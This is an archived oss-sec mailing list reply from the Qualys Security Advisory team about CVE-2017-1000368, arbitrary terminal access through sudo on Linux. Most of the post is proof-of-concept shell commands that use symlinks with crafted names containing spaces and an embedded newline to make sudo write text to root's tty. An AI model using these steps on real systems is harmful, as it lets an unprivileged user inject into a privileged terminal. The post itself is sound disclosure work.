oss-sec mailing list archives
Re: Arbitrary terminal access via sudo on Linux
From: Qualys Security Advisory <qsa () qualys com>
Date: Tue, 6 Jun 2017 15:31:00 -0700
On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote:
However, the arbitrary tty access IS exploitable in 1.8.20p1.
For example, against Sudo < 1.8.20p1:
$ /usr/bin/sudo -l
...
User john may run the following commands on localhost:
(nobody) /usr/bin/sum
$ ln -s /usr/bin/sudo ' 1026 '
(1026 is tty2, currently used by root)
$ ./' 1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'
(this is written to root's tty2)
Or, against Sudo = 1.8.20p1:
$ ln -s /usr/bin/sudo $') 1026 \n'
$ ./$') 1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'
CVE-2017-1000368 was assigned to this newline vulnerability:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368
With best regards,
--
the Qualys Security Advisory team
Current thread:
- Arbitrary terminal access via sudo on Linux Todd C. Miller (Jun 02)
- Re: Arbitrary terminal access via sudo on Linux Kurt Seifried (Jun 02)
- Re: Arbitrary terminal access via sudo on Linux Todd C. Miller (Jun 02)
- Re: Arbitrary terminal access via sudo on Linux Qualys Security Advisory (Jun 06)
- Re: Arbitrary terminal access via sudo on Linux Todd C. Miller (Jun 02)
- Re: Arbitrary terminal access via sudo on Linux Kurt Seifried (Jun 02)